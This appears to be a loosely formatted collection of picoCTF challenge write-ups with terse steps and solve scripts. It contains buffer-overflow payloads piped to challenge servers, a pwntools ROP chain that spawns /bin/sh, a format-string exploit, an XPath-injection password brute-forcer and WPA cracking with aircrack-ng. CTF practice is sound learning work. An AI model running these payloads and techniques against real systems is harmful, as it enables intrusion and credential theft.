with open("out.txt", 'rt') as f:
enc_payload = f.read().split(",")
dummy = []
for i in range(len(enc_payload)):
dummy += [i]
decode = [b"\x00"]*len(enc_payload)
k = 0
for i in enc_payload:
tmp = random.randrange(65536)
tmp = bytes([int(i,16)^random.randrange(256)])
decode[dummy[k]] = tmp
k += 1
with open("solved.png", 'wb') as f:
- https://b1ue.x0.com/writeup/2021picomini/#scrambled-bytes
- https://activities.tjhsst.edu/csc/writeups/picomini-redpwn-darin
- https://github.com/Dvd848/CTFs/blob/master/2021_picoCTF_redpwn/scrambled-bytes.md
cmp -bl breadth.v1 breadth.v2
and get this
742 250 M-( 247 M-'
743 361 M-q 335 M-]
744 264 M-4 251 M-)
610380 124 T 104 D
610383 270 M-8 110 H
610384 72 : 75 =
610385 200 M-^@ 76 >
0d650380 = 0x9504C 2. Look up the function located at address 0x9504C in ghidra (or IDA) to get the flag
- https://www.ctfwriteup.com/picoctf/picomini-by-redpwn/reverse-engineering#breadth
- https://hackmd.io/@bigdrea6/BJcLLkoW5
- Finding the IEEE 802.11 wireless protocol used in the wireless traffic packet capture is easier with wireshark, the JAWS of the network.
- Aircrack-ng can make a pcap file catch big air...and crack a password.
wget https://artifacts.picoctf.net/c/8/wpa-ing_out.pcap
- Get a rockyou.txt from github
aircrack-ng wpa-ing_out.pcap -w ./rockyou.txt
and you'll get your key
- https://www.youtube.com/watch?v=mAZ7PjEfWU0&ab_channel=MikeOnTech
- https://www.youtube.com/watch?v=GmCzkyRmVZc&ab_channel=MichaelDProvenzano
wget https://artifacts.picoctf.net/c/430/bloat.flag.py
wget https://artifacts.picoctf.net/c/430/flag.txt.enc
vim bloat.flag.py
and comment these
arg432 = arg232()
- Run
python bloat.flag.py
and get your key
- Make sure you consider big Endian vs small Endian.
- Changing the address of the return pointer can call different functions.
wget https://artifacts.picoctf.net/c/252/vuln
andwget https://artifacts.picoctf.net/c/252/vuln.c
strings vuln.c
read it andcat > flag.txt
and write anything you wantchmod +x vuln
, rungdb ./vuln
,info functions
and find thewin
's address- Use overflow-exploit-pattern-generator to generate a random overflow text
- Paste the result after running
and find out that anything after 44 overflow offset will be parts of the output location (echo -ne 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab\xf6\x91\x04\x08\n'; cat -) | nc saturn.picoctf.net 63550
and get your flag
- https://shinris3n.github.io/writeups/2022/04/01/PicoCTF2022-buf1.html
- https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
- Use a decompiler for Java!
- Download the file and upload it to Java Decompiler
import java.util.Scanner;
// Decompiled by Procyon v0.5.36
public class KeygenMe
public static void main(final String[] array) {
final Scanner scanner = new Scanner(System.in);
System.out.println("Enter key:");
final String nextLine = scanner.nextLine();
if (nextLine.length() != 34) {
System.out.println("Invalid key");
if (nextLine.charAt(33) != '}') {
System.out.println("Invalid key");
if (nextLine.charAt(32) != 'd') {
System.out.println("Invalid key");
if (nextLine.charAt(31) != '0') {
System.out.println("Invalid key");
if (nextLine.charAt(30) != 'a') {
System.out.println("Invalid key");
if (nextLine.charAt(29) != '1') {
System.out.println("Invalid key");
if (nextLine.charAt(28) != 'e') {
System.out.println("Invalid key");
if (nextLine.charAt(27) != 'f') {
System.out.println("Invalid key");
if (nextLine.charAt(26) != 'b') {
System.out.println("Invalid key");
if (nextLine.charAt(25) != '2') {
System.out.println("Invalid key");
if (nextLine.charAt(24) != '_') {
System.out.println("Invalid key");
if (nextLine.charAt(23) != 'd') {
System.out.println("Invalid key");
if (nextLine.charAt(22) != '3') {
System.out.println("Invalid key");
if (nextLine.charAt(21) != 'r') {
System.out.println("Invalid key");
if (nextLine.charAt(20) != '1') {
System.out.println("Invalid key");
if (nextLine.charAt(19) != 'u') {
System.out.println("Invalid key");
if (nextLine.charAt(18) != 'q') {
System.out.println("Invalid key");
if (nextLine.charAt(17) != '3') {
System.out.println("Invalid key");
if (nextLine.charAt(16) != 'r') {
System.out.println("Invalid key");
if (nextLine.charAt(15) != '_') {
System.out.println("Invalid key");
if (nextLine.charAt(14) != 'g') {
System.out.println("Invalid key");
if (nextLine.charAt(13) != 'n') {
System.out.println("Invalid key");
if (nextLine.charAt(12) != '1') {
System.out.println("Invalid key");
if (nextLine.charAt(11) != 'l') {
System.out.println("Invalid key");
if (nextLine.charAt(10) != '0') {
System.out.println("Invalid key");
if (nextLine.charAt(9) != '0') {
System.out.println("Invalid key");
if (nextLine.charAt(8) != '7') {
System.out.println("Invalid key");
if (nextLine.charAt(7) != '{') {
System.out.println("Invalid key");
if (nextLine.charAt(6) != 'F') {
System.out.println("Invalid key");
if (nextLine.charAt(5) != 'T') {
System.out.println("Invalid key");
if (nextLine.charAt(4) != 'C') {
System.out.println("Invalid key");
if (nextLine.charAt(3) != 'o') {
System.out.println("Invalid key");
if (nextLine.charAt(2) != 'c') {
System.out.println("Invalid key");
if (nextLine.charAt(1) != 'i') {
System.out.println("Invalid key");
if (nextLine.charAt(0) != 'p') {
System.out.println("Invalid key");
System.out.println("Valid key");
- Do you know how to modify cookies?
- Use 'EditThisCookie' to set 'isAdmin'(shows up after pushing the 'EditThisCookie' button) to 1
- After reloading it you'll get the key
- Press the link and add
to the URL - Decode the three strings by Base64 Decoder and add the normal one to the URL
- Reload to get your flag
- How does the program check if you won?
wget https://artifacts.picoctf.net/c/444/game-redacted.c
andstrings game-redacted.c
to read the source code- Keeps enter
five times to get your flag
- folders folders folders
- Press the link
- Open the picture in a new tab and delete the strings after
http://saturn.picoctf.net:49917/secret/assets/DX1KYM.jpg >>> http://saturn.picoctf.net:49917/secret
- Now your window must be a gif of Christopher Michael "Chris" Pratt.
- Press
Ctrl + U
and press thehidden/file.css
behind 'herf' and deletefile.css
in the URL - Now a login page pops out, press
Ctr + U
and click thesuperhidden/login.css
behind 'herf' - Remove
in the URL andFinally. You found me. But can you see me
pops out - Press
Ctrl + U
and get your flag
- DevTool...:smile:
wget https://artifacts.picoctf.net/c/332/disk.flag.img.gz
andgunzip disk.flag.img.gz
- Run
mmls disk.flag.img
to see the partition table - Grab the 'Start' number of the one have largest number of 'Length'
fls -o THE_NUMBER_YOU_GOT disk.flag.img
and saw ...
d/d 1994: opt
d/d 1995: root
d/d 1996: run
fls -o 360448 disk.flag.img 1995
and get
r/r 2363: .ash_history
d/d 3981: my_folder
- Look up
fls -o 360448 disk.flag.img 3981
r/r * 2082(realloc): flag.txt
r/r 2371: flag.uni.txt
- Grab the flag by running
icat -o 360448 disk.flag.img 2371
- Press the 'Launch' button
psql -h saturn.picoctf.net -p 50505 -U postgres pico
and type in the password it gave\dt
to list the table
Schema | Name | Type | Owner
public | flags | table | postgres
(1 row)
SELECT * FROM flags;
to get the flag
id | firstname | lastname | address
1 | Luke | Skywalker | picoCTF{L3arN_S0m3_5qL_t0d4Y_21c94904}
2 | Leia | Organa | Alderaan
3 | Han | Solo | Corellia
(3 rows)
- Press the link and get the hints
- Now that we're in 64-bit, what used to be 4 bytes, now may be 8 bytes.
- Jump to the second instruction (the one after the first push) in the flag function, if you're getting mysterious segmentation faults.
wget https://artifacts.picoctf.net/c/194/vuln.c
and read the code after runningstrings vuln.c
wget https://artifacts.picoctf.net/c/194/vuln
readelf -s vuln | grep FUNC
and it returns where vuln is
48: 0000000000000000 0 FUNC GLOBAL DEFAULT UND puts@@GLIBC_2.2.5
49: 00000000004012b2 32 FUNC GLOBAL DEFAULT 15 vuln
51: 00000000004013b8 0 FUNC GLOBAL HIDDEN 16 _fini
- Run
python3 -c 'import struct; print("A"*72 + struct.pack("<I", 0x000000000040123b).decode("utf8"))' | nc saturn.picoctf.net 63880
to get the flag
- https://github.com/pmateja/picoCTF_2022_writeups/blob/main/x-sixty-what.md
- https://github.com/gointhrushell/PicoWriteups/blob/main/binary_exploitation/200pts/x-sixty-what.pdf
- assembly conditions
wget https://jupiter.challenges.picoctf.org/static/ceac75672637589213b952abe32c84b3/test.S
vim test.S
and look at the source codevim solve.py
and write these
def asm2(arg1, arg2):
# asm2:
# <+0>: push ebp
# <+1>: mov ebp,esp
# <+3>: sub esp,0x10
# <+6>: mov eax,DWORD PTR [ebp+0xc]
eax = arg2
#<+9>: mov DWORD PTR [ebp-0x4],eax
local1 = eax
#<+12>: mov eax,DWORD PTR [ebp+0x8]
eax = arg1
#<+15>: mov DWORD PTR [ebp-0x8],eax
local2 = eax
# <+18>: jmp 0x50c <asm2+31>
# <+20>: add DWORD PTR [ebp-0x4],0x1
# <+24>: add DWORD PTR [ebp-0x8],0xd1
# <+31>: cmp DWORD PTR [ebp-0x8],0x5fa1
# <+38>: jle 0x501 <asm2+20>
while(local2 <= 0x5fa1):
local1 = (local1 + 1) & 0xffffffff #This truncates the result to 32 bits.
local2 = (local2 + 0xd1) & 0xffffffff #This truncates the result to 32 bits.
It is necessary to truncate the restuls because in python does not have
buffer overflow but 0x86 can have so we have to truncate it.
# <+40>: mov eax,DWORD PTR [ebp-0x4]
# <+43>: leave
# <+44>: ret
return hex(local1)
print(asm2(0x4, 0x2d))
- Run
python solve.py
to get the flag
- How did pictures from the moon landing get sent back to Earth?
- What is the CMU mascot?, that might help select a RX option
wget https://jupiter.challenges.picoctf.org/static/fa4a277cfa846e07a5981d8a19288a2e/whitepages.txt
xxd -g 1 whitepages.txt | head
and get to know there are two kinds of spacesvim solve.py
and paste
from pwn import *
with open("whitepages.txt", "rb") as bin_file:
data = bytearray(bin_file.read())
data = data.replace(b'\xe2\x80\x83', b'0')
data = data.replace(b'\x20', b'1')
data = data.decode("ascii")
print (unbits(data))
- Press esc &
to quit the mode and runpython solve.py
to get the flag
- Try fixing the file header
- Download the file and upload to Hexed.it
- Fix it to
- Download it and get your flag Don't forget to change the file name to png
- Use a search engine to find an "ASCII table".
- You will also need to know the difference between octal, decimal, and hexadecimal numbers.
wget https://jupiter.challenges.picoctf.org/static/c695ee23309d453a3ef369c34cc1bccb/VaultDoor4.java
- Copy the
byte[] myBytes = {...}
andvim PW.java
public class PW{
public static void main(String []args){
byte[] myBytes = {
106 , 85 , 53 , 116 , 95 , 52 , 95 , 98 ,
0x55, 0x6e, 0x43, 0x68, 0x5f, 0x30, 0x66, 0x5f,
0142, 0131, 0164, 063 , 0163, 0137, 070 , 0146,
'4' , 'a' , '6' , 'c' , 'b' , 'f' , '3' , 'b' ,
String password = "";
for(byte b : myBytes){
password += (char)b;
- Press
and runjavac PW.java
,java PW
to get your key
- Try and script this, it'll save you a lot of time
wget https://jupiter.challenges.picoctf.org/static/52084b5ad360b25f9af83933114324e0/1000.tar
and runtar xvf 1000.tar
- But it outputs
which doesn't have flag after catting it - Type this in your shell
cp 1000.tar out
cd out
for ((i = 1000; i > 0; i--)); do
if [ ! -f "$i.tar" ]; then
tar -xvf $i.tar
rm $i.tar
cd ..
- At last, you'll see a file.png. Open it to get your flag
- http://note.drx.tw/2008/04/command.html
- https://github.com/Dvd848/CTFs/blob/master/2019_picoCTF/like1000.md
- Tools can be helpful, but you may need to look around for yourself.
- Remember, in CTF problems, if something seems weird it probably means something...
wget https://jupiter.challenges.picoctf.org/static/dc18d0e961a348bb5a45aae1c3fe10ad/Makefile
,wget https://jupiter.challenges.picoctf.org/static/dc18d0e961a348bb5a45aae1c3fe10ad/vuln.c
,wget https://jupiter.challenges.picoctf.org/static/dc18d0e961a348bb5a45aae1c3fe10ad/vuln
cat Makefile
and realize that it might have buffer overflow- Read
vim vuln.c
andvim sol.c
#include <stdio.h>
#include <stdlib.h>
long get_random(){
return rand() % 100;
int main()
int i = 0;
while(i < 10){
return 0;
gcc sol.c -o sol
to get the random numberschmod -x ./vuln
,gdb ./vuln
and pass the random number in it, it asked for a name where seems to be the place to do buffer overflowROPgadget --binary ./vuln --ropchain
and copyp += pack('<Q', 0x0000000000475430) # add rax, 1 ; ret
s at the last output partcat > bob
and write things you just copiedwc bob
and you'll see59 590 3245 bob
readelf -S vuln
andvim solve.py
#!/usr/bin/env python3
from pwn import *
def convertASCII_to_Hex(value):
res = ""
for i in value:
res += hex(ord(i))[2:]
return res
def changeEndian(value):
length = len(value)
res = "0x"
for i in range(length-1, 0, -2):
res += value[i-1]+ value[i]
return res
def generateString(value):
return int(changeEndian(convertASCII_to_Hex(value)), 16)
# win the game
def generatePayload():
offset = b'a' * 120
pop_rsi = p64(0x410ca3) # pop rsi ; ret
data_address = p64(0x00000000006bc3a0) # data address to store the /bin/sh
pop_rax = p64(0x4163f4) # pop rax ; ret
bin_syscall = p64(generateString("/bin/sh"))
mov_rsi_rax = p64(0x47ff91) # mov qword ptr [rsi], rax ; ret
pop_rdi = p64(0x400696) # pop rdi ; ret
xor_rax_rax = p64(0x445950)
pop_rdx = p64(0x44a6b5)
syscall = p64(0x40137c)
execv = p64(0x3b) # 0x3b = 59 in hexadecimal, it corresponds to the
# identifier of the execv method
payload = offset + pop_rax + bin_syscall + pop_rsi + data_address + mov_rsi_rax + pop_rax + p64(0x3b) + pop_rdi + data_address + pop_rsi + p64(0x0) + pop_rdx + p64(0x0) + syscall
return payload
def main():
elf = ELF('vuln') #context.binary
remote_or_local = input("Is it local or remote?:\n1 - Local\n2 - Remote\nYour option: ")
if(int(remote_or_local) == 1):
p = process(elf.path)
elif(int(remote_or_local) == 2):
p = remote('jupiter.challenges.picoctf.org', 39940)
print("That is not a correct option, exiting")
if __name__ == "__main__":
python solve.py
and after runningls
you would see a flag.txtcat flag.txt
and get your flag
- https://www.youtube.com/watch?v=fAXpsO10Chs&ab_channel=MartinCarlisle
- https://www.runoob.com/linux/linux-comm-more.html
- https://mregraoncyber.com/picoctf-writeup-guessing-game-1/
- https://ithelp.ithome.com.tw/articles/10193042
- Music is cool, but what other kinds of waves are there?
- Look deep below the surface
wget https://mercury.picoctf.net/static/cf917a179937f814d966e53bb1fd4b90/main.wav
and runpython3
>>> from scipy.io import wavfile
>>> data = wavfile.read("main.wav")
>>> print(data)
# You'll see a array in here
>>> import numpy as np
>>> print(np.unique(data[1])
>>> x=[y//100 for y in data[1]]
>>> print(x)
# Too big
>>> x=[y//100//5-2 for y in data[1]]
>>> print(x)
>>> import string
>>> string.hexdigits
>>> y=[string.hexdigits[j] for j in x]
>>> print(y)
>>> z = "".join(y)
>>> print(z)
>>> bytearray.fromhex(z).decode()
# Here contains the flag
- It seems to pass
tonc mercury.picoctf.net 5654
after press1
but my web shell died everytime when I'm running it...
Or use this python code
from pwn import *
payload = '%c'*10
payload += '%6299662c'
payload += '%n'
payload += '%216c'
payload += '%20$hhn'
payload += '%10504067c'
payload += '%Portfolio_LOCATION$n'
- https://activities.tjhsst.edu/csc/writeups/picoctf-2021-stonk-market
- https://www.youtube.com/watch?v=gLFJFXpY44w&ab_channel=MartinCarlisle
- Press the link
- Code this in terminal to find out user id (number in front of
<!-- <strong>Title</strong> --> You're on the right path.
> do
> echo $i
> curl -s 'http://mercury.picoctf.net:20297/' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw "name=' or //user[position()=$i]/pass[starts-with(text(),'pico')] or 'a'='+&pass=a" | grep right
> done
vim solve.py
and write this down
from pwn import *
import requests
import string
import urllib
user_id = 3
password = ""
with log.progress('Brute-forcing password') as p:
index = 1
while not password.endswith("}"):
for c in string.ascii_letters + "{}_" + string.digits:
p.status(f"Index: {index}, known password: '{password}', trying: '{c}'")
r = requests.post("http://mercury.picoctf.net:20297/", data = {"name": f"' or substring(//user[position()={user_id}]/pass,{index},1)='{c}' or 'a'='", "pass": "test"})
if "right" in r.text:
password += c
print(f"Can't find character for index {index}!")
index += 1
print(f"Password: {password}")
python solve.py
and get your flag
My webshell went wrong ...
all the files and look the contentsvim solve.py
and paste the variable in encrypted-messages.txt
#!/usr/bin/env python3
from Crypto.Util.number import inverse, long_to_bytes
from sympy import integer_nthroot
e = 3
n1 = 12426348204210593270343924563278821305386892683425418957350363905840484905896816630189546938112358425679727243103082954824537007026886458498690134225705484501535835385800730412220192564706251228021192115494699150390312107794005569764411063907390563937247515046052549753641884721864426154021041082461015103337120756347692245843318676049947569653604616584167536958803278688355036036887022591104659059883622072052793378468850702811804337808760402077376453702190206077039468600466511349923882037572540505571672225260106649075841827340894515208811788428239691505001675042096850318994923571686175381862745049100863883977473
c1 = 5065488652323342174251548936130018278628515304559137485528400780060697119682927936946069625772269234638180036633146283242714689277793018059046463458498115311853401434289264038408827377579534270489217094049453933816452196508276029690068611901872786195723358744119490651499187556193711866091991489262948739533990000464588752544599393
n2 = 19928073532667002674271126242460424264678302463110874370548818138542019092428748404842979311103440183470341730391245820461360581989271804887458051852613435204857098017249255006951581790650329570721461311276897625064269097611296994752278236116594018565111511706468113995740555227723579333780825133947488456834006391113674719045468317242000478209048237262125983164844808938206933531765230386987211125968246026721916610034981306385276396371953013685639581894384852327010462345466019070637326891690322855254242653309376909918630162231006323084408189767751387637751885504520154800908122596020421247199812233589471220112129
c2 = 86893891006724995283854813014390877172735163869036169496565461737741926829273252426484138905500712279566881578262823696620415864916590651557711035982810690227377784525466265776922625254135896966472905776613722370871107640819140591627040592402867504449339363559108090452141753194477174987394954897424151839006206598186417617292433784471465084923195909989
n3 = 13985338100073848499962346750699011512326742990711979583786294844886470425669389469764474043289963969088280475141324734604981276497038537100708836322845411656572006418427866013918729379798636491260028396348617844015862841979175195453570117422353716544166507768864242921758225721278003979256590348823935697123804897560450268775282548700587951487598672539626282196784513553910086002350034101793371250490240347953205377022300063974640289625028728548078378424148385027286992809999596692826238954331923568004396053037776447946561133762767800447991022277806874834150264326754308297071271019402461938938062378926442519736239
c3 = 86893891006724995283854813014390877172735163869036169496565461737741926829273252426484138905500712279566881578262823696620415864916590651557711035982810690227377784525466265776922625254135896966472905776613722370871107640819140591627040592402867504449339363559108090452141753194477174987394954897424151839006206598186417617292433784471465084923195909989
n4 = 19594695114938628314229388830603768544844132388459850777761001630275366893884362012318651705573995962720323983057152055387059580452986042765567426880931775302981922724052340073927578619711314305880220746467095847890382386552455126586101506301413099830377279091457182155755872971840333906012240683526684419808580343325425793078160255607072901213979561554799496270708954359438916048029174155327818898336335540262711330304350220907460431976899556849537752397478305745520053275803008830388002531739866400985634978857874446527750647566158509254171939570515941307939440401043123899494711660946335200589223377770449028735883
c4 = 5065488652323342174251548936130018278628515304559137485528400780060697119682927936946069625772269234638180036633146283242714689277793018059046463458498115311853401434289264038408827377579534270489217094049453933816452196508276029690068611901872786195723358744119490651499187556193711866091991489262948739533990000464588752544599393
n5 = 12091176521446155371204073404889525876314588332922377487429571547758084816238235861014745356614376156383931349803571788181930149440902327788407963355833344633600023056350033929156610144317430277928585033022575359124565125831690297194603671159111264262415101279175084559556136660680378784536991429981314493539364539693532779328875047664128106745970757842693549568630897393185902686036462324740537748985174226434204877493901859632719320905214814513984041502139355907636120026375145132423688329342458126031078786420472123904754125728860419063694343614392723677636114665080333174626159191829467627600232520864728015961207
c5 = 301927034179130315172951479434750678833634853032331571873622664841337454556713005601858152523700291841415874274186191308636935232309742600657257783870282807784519336918511713958804608229440141151963841588389502276162366733982719267670094167338480873020791643860930493832853048467543729024717103511475500012196697609001154401
n6 = 19121666910896626046955740146145445167107966318588247850703213187413786998275793199086039214034176975548304646377239346659251146907978120368785564098586810434787236158559918254406674657325596697756783544837638305550511428490013226728316473496958326626971971356583273462837171624519736741863228128961806679762818157523548909347743452236866043900099524145710863666750741485246383193807923839936945961137020344124667295617255208668901346925121844295216273758788088883216826744526129511322932544118330627352733356335573936803659208844366689011709371897472708945066317041109550737511825722041213430818433084278617562166603
c6 = 38999477927573480744724357594313956376612559501982863881503907194813646795174312444340693051072410232762895994061399222849450325021561935979706475527169503326744567478138877010606365500800690273
n7 = 13418736740762596973104019538568029846047274590543735090579226390035444037972048475994990493901009703925021840496230977791241064367082248745077884860140229573097744846674464511874248586781278724368902508880232550363196125332007334060198960815141256160428342285352881398476991478501510315021684774636980366078533981139486237599681094475934234215605394201283718335229148367719703118256598858595776777681347337593280391052515991784851827621657319164805164988688658013761897959597961647960373018373955633439309271548748272976729429847477342667875183958981069315601906664672096776841682438185369260273501519542893405128843
c7 = 38999477927573480744724357594313956376612559501982863881503907194813646795174312444340693051072410232762895994061399222849450325021561935979706475527169503326744567478138877010606365500800690273
n8 = 11464859840071386874187998795181332312728074122716799062981080421188915868236220735190397594058648588181928124991332518259177909372407829352545954794824083851124711687829216475448282589408362385114764290346196664002188337713751542277587753067638161636766297892811393667196988094100002752743054021009539962054210885806506140497869746682404059274443570436700825435628817817426475943873865847012459799284263343211713809567841907491474908123827229392305117614651611218712810815944801398564599148842933378612548977451706147596637225675719651726550873391280782279097513569748332831819616926344025355682272270297510077861213
c8 = 38999477927573480744724357594313956376612559501982863881503907194813646795174312444340693051072410232762895994061399222849450325021561935979706475527169503326744567478138877010606365500800690273
n9 = 21079224330416020275858215994125438409920350750828528428653429418050688406373438072692061033602698683604056177670991486330201941071320198633550189417515090152728909334196025991131427459901311579710493651699048138078456234816053539436726503461851093677741327645208285078711019158565296646858341000160387962592778531522953839934806024839570625179579537606629110275080930433458691144426869886809362780063401674963129711723354189327628731665487157177939180982782708601880309816267314061257447780050575935843160596133370063252618488779123249496279022306973156821343257109347328064771311662968182821013519854248157720756807
c9 = 301927034179130315172951479434750678833634853032331571873622664841337454556713005601858152523700291841415874274186191308636935232309742600657257783870282807784519336918511713958804608229440141151963841588389502276162366733982719267670094167338480873020791643860930493832853048467543729024717103511475500012196697609001154401
n10 = 22748076750931308662769068253035543469890821090685595609386711982925559973042348231161108618506912807763679729371432513862439311860465982816329852242689917043600909866228033526990181831690460395726449921264612636634984917361596257010708960150801970337017805161196692131098507198455206977607347463663083559561805065823088182032466514286002822511854823747204286303638719961067031142962653536148315879123067183501832837303731109779836127520626791254669462630052241934836308543513534520718206756591694480011760892620054163997231711364648699030108110266218981661196887739673466188945869132403569916138510676165684240183111
c10 = 5065488652323342174251548936130018278628515304559137485528400780060697119682927936946069625772269234638180036633146283242714689277793018059046463458498115311853401434289264038408827377579534270489217094049453933816452196508276029690068611901872786195723358744119490651499187556193711866091991489262948739533990000464588752544599393
n11 = 15211900116336803732344592760922834443004765970450412208051966274826597749339532765578227573197330047059803101270880541680131550958687802954888961705393956657868884907645785512376642155308131397402701603803647441382916842882492267325851662873923175266777876985133649576647380094088801184772276271073029416994360658165050186847216039014659638983362906789271549086709185037174653379771757424215077386429302561993072709052028024252377809234900540361220738390360903961813364846209443618751828783578017709045913739617558501570814103979018207946181754875575107735276643521299439085628980402142940293152962612204167653199743
c11 = 301927034179130315172951479434750678833634853032331571873622664841337454556713005601858152523700291841415874274186191308636935232309742600657257783870282807784519336918511713958804608229440141151963841588389502276162366733982719267670094167338480873020791643860930493832853048467543729024717103511475500012196697609001154401
n12 = 21920948973299458738045404295160882862610665825700737053514340871547874723791019039542757481917797517039141169591479170760066013081713286922088845787806782581624491712703646267369882590955000373469325726427872935253365913397944180186654880845126957303205539301069768887632145154046359203259250404468218889221182463744409114758635646234714383982460599605335789047488578641238793390948534816976338377433533003184622991479234157434691635609833437336353417201442828968447500119160169653140572098207587349003837774078136718264889636544528530809416097955593693611757015411563969513158773239516267786736491123281163075118193
c12 = 86893891006724995283854813014390877172735163869036169496565461737741926829273252426484138905500712279566881578262823696620415864916590651557711035982810690227377784525466265776922625254135896966472905776613722370871107640819140591627040592402867504449339363559108090452141753194477174987394954897424151839006206598186417617292433784471465084923195909989
ciphertexts = {c1:n1, c2:n2, c3:n3, c4:n4, c5:n5, c6:n6, c7:n7, c8:n8, c9:n9, c10:n10, c11:n11, c12:n12}
for c in ciphertexts:
while True:
# Example: integer_nthroot(16, 2) => (4, True)
# Note that the True or False here is boolean value
result = integer_nthroot(c, 3)
if result[1]:
m = result[0]
c += ciphertexts[c]
plaintext = long_to_bytes(m).decode()
Web shell in picoCTF can't install pwninit... and lots of useful tools
- https://heinen.dev/picoctf-2021-redpwn/
- https://activities.tjhsst.edu/csc/writeups/picomini-redpwn-darin
- Try using an emulator or device
- https://developer.android.com/studio
I can't any VM or my laptop will die...
- Do you think you can master rockstar?
- Download the file and copy the text in it
- Paste them to ROCKSTAR and press 'ROCK!'
- Copy the output and paste it to ASCII to Text
- Get your flag after hitting 'Convert to string' button
- Use the clues to extract the another flag from the .wav file
all the files and do the same as m00nwalk1 does- Search
Alan Eliasen the Future Boy
and the second URL might brought you to here steghide extract -sf message.wav -p hidden_stegosaurus
andcat steganopayload12154.txt